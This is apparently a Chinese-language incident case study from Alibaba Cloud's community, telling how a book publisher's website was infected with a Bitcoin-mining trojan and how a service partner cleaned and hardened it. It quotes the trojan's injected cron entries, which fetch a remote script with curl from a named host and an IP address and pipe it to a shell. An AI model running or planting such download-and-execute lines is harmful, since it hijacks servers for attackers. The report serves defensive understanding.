119 技術社區[雲棲]

資源消耗異常，竟是因為比特幣挖礦木馬

上周末起，大規模網絡勒索襲擊迅速波及全球百餘國家和地區，病毒鎖死用戶數據和電腦文件，要用戶支付價值300-
600美元的比特幣贖金，成為刷屏級新聞。

比特幣是一種網絡虛擬貨幣，主要基於一套密碼編碼、通過複雜算法產生，任何人都可以下載運行比特幣客戶端參與製造比特幣，這個過程也被形象地稱為“挖礦”。而比特幣“挖礦木馬”，就是由黑客通過木馬控製大量肉雞電腦，為其製造比特幣的惡意程序。

警方繳獲的比特幣“挖礦機”

阿裏雲服務的客戶中，就有中過招的。
北京新華先鋒出版科技有限公司是一家專業從事圖書策劃、代理出版和營銷推廣的現代化綜合性文化產業機構，其旗下子公司北京酷讀文化有限公司，負責運營網絡文學網站——酷讀網，簽有國內知名的網絡作家，頗具影響力。
在2016年11月份，網站開始出現CPU、內存資源消耗異常，網站響應速度變慢，而用戶訪問量沒有明顯變化。技術團隊幾經排查處理，仍不能消除故障。新華先鋒希望找到專業運維人員，一來快速解決問題，恢複網站正常運營，二來長期為網站保駕護航，保障係統穩定，自身集中精力拓展業務。

多方考察，選擇了阿裏雲生態服務合作夥伴博偉來提供服務保障。通過技術診斷，發現網站遭到了“比特幣挖礦木馬”的入侵。有些木馬病毒的高級版本，可以篡改Linux的基礎命令，技術人員很難用一般的方法找到木馬進程。技術人員需要結合運維經驗、網上的資料、用戶故障時間點和係統log分析等綜合手段才能定位問題。

新華先鋒中的木馬就是如此。黑客利用係統漏洞，通過web腳本植入該木馬，盜用服務器資源進行比特幣開采計算。通過下載並分析該木馬腳本文件，博偉技術人員發現該木馬修改了係統登錄認證配置、計劃任務、創建采礦進程進行數據接收和處理，同時偽造係統服務，充當守護進程。
l 被篡改的計劃任務：
*/10 * * * * curl -fsSL https://www.haveabitchin.com/pm.sh?1116 | sh

*/1 * * * * root curl -fs https://101.55.126.66:8990/pm.sh | bash

l 木馬文件：

l 木馬守護進程：

l 被篡改的SSH配置：

博偉技術人員指導新華先鋒完成數據備份，清理了木馬進程、守護進程，恢複被篡改的配置文件和計劃任務等，在係統恢複正常後進行了一係列加固操作：緩存數據庫Redis、IP綁定/密碼驗證/更換端口、ROOT登錄限製/密碼修改、Mysql、FTP、SSH端口更換、IPtable訪問控製，阿裏雲ECS實例的安全組IP/端口限製/快照備份。